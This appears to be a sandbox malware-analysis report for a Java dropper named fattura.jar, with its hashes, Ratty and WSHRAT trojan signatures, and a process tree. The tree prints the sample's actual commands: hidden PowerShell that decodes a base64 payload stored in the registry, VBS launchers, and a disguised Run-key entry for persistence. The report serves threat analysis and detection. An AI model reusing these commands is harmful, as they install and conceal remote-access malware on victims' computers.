Overview

overview

10

Static

static

fattura.jar

windows7_x64

10

fattura.jar

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows10_x64
  • resource
    win10v200430
  • submitted
    10-07-2020 10:24

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    fattura.jar

  • Size

    221KB

  • MD5

    4ebaf0ed00b6136fe1e4273508d855fa

  • SHA1

    a3e6b82b95500b8eda4ab37a8f3865d47af3c7ad

  • SHA256

    be32a4b1ba9b1ac7803eac01ca4a38f96770ad27d2d434794809ba3242182b0d

  • SHA512

    80c243457a0b879b0cd2484837357326593131207e200f93cd4f40a2ce5dd4c8e5590c6f67638b7942c1ca6634abc637fa9658b81791116419960deb349f49c3

Score
10/10
persistencetrojanwshratratratty

Malware Config

Signatures

  • Ratty

    Ratty is an open source Java Remote Access Tool.

    trojanratratty
  • Ratty Rat Payload 1 IoCs
  • WSHRAT

    WSHRAT is a variant of Houdini worm and has vbs and js variants.

    trojanwshrat
  • Blacklisted process makes network request 26 IoCs
  • Drops startup file 2 IoCs
  • Adds Run key to start application 2 TTPs 8 IoCs
    persistence
  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\ProgramData\Oracle\Java\javapath\java.exe
    java -jar C:\Users\Admin\AppData\Local\Temp\fattura.jar
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2536
    • C:\Windows\SYSTEM32\wscript.exe
      wscript C:\Users\Admin\wppvqiibus.vbs
      2⤵
      • Adds Run key to start application
      • Modifies registry class
      • Suspicious use of WriteProcessMemory
      PID:1684
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!%','m');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2144
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\gVbTbNmsTj.vbs"
        3⤵
        • Blacklisted process makes network request
        • Drops startup file
        • Adds Run key to start application
        • Suspicious use of WriteProcessMemory
        PID:2888
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -windowstyle hidden -Command "$humanRights = (get-itemproperty -path 'HKCU:\SOFTWARE\Microsoft\' -name 'turK3y').turK3y;$humanRights=$humanRights.replace('!%','A');$Abt = [Convert]::FromBase64String($humanRights);$Out = [System.Text.Encoding]::ASCII.GetString($Abt);new-itemproperty -path 'HKCU:\SOFTWARE\Microsoft' -name 'turK3y' -value $Out -propertytype multistring -force | out-null;"
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2356
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -version 2> C:\Users\Admin\AppData\Local\Temp\output.txt
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3788
        • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
          "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -version
          4⤵
            PID:3684
        • C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe
          "C:\Program Files\Java\jre1.8.0_66\bin\javaw.exe" -jar "C:\Users\Admin\AppData\Roaming\ntfsmgr.jar"
          3⤵
          • Suspicious use of SetWindowsHookEx
          • Suspicious use of WriteProcessMemory
          PID:3308
          • C:\Windows\SYSTEM32\REG.exe
            REG ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Adobe Java bridge" /d "C:\Users\Admin\AppData\Roaming\Adobe\AIR\jre13v3bridge.jar"
            4⤵
            • Adds Run key to start application
            • Modifies registry key
            PID:3432

    Network

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads